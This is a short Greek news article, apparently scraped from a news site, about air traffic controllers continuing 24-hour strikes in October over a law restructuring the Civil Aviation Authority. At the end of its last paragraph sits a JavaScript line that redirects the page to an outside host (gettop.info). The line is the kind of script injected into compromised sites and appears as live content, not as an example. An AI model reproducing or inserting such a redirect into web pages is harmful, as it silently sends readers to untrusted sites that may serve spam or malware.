Συνεχίζονται οι απεργίες των ελεγκτών εναέριας κυκλοφορίας

0
3

 

Παραμένουν καθηλωμένα στο έδαφος τα αεροσκάφη στα ελληνικά αεροδρόμια καθώς οι ελεγκτές εναέριας κυκλοφορίας αποφάσισαν τη συνέχιση των 24ωρων επαναλαμβανόμενων απεργιών τους.

Καθώς η συνάντηση με τον υπουργό Μεταφορών Χρήστο Σπίρτζη και τον διοικητή της ΥΠΑ Κ. Λιντζεράκο, απέβη άκαρπη η Ένωση Ελεγκτών Εναέριας Κυκλοφορίας Ελλάδας (ΕΕΕΚΕ) εμμένει στις κινητοποιήσεις, εκφράζοντς έτσι την αντίδραση στον νόμο που αφορά ατην αναδιάρθρωση της Υπηρεσίας Πολιτικής Αεροπορίας.

Οι ελεγκτές εναέριας κυκλοφορίας έχουν εξαγγείλει 24ωρες απεργίες για την Κυριακή 9 Οκτωβρίου, τη Δευτέρα 10 Οκτωβρίου, την Τετάρτη 12 Οκτωβρίου και την Πέμπτη 13 Οκτωβρίου, από τις 00:01 έως τις 23:59.

Τις ημέρες αυτές δεν θα εκτελείται καμία πτήση από και προς τα ελληνικά αεροδρόμια. Οι ελεγκτές ζητούν τη μη εφαρμογή-τροποποίηση συγκεκριμένων άρθρων του νέου νόμου που φέρει τον τίτλο «Σύσταση Αρχής Πολιτικής Αεροπορίας, Αναδιάρθρωση της Υπηρεσίας Πολιτικής Αεροπορίας και άλλες διατάξεις». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here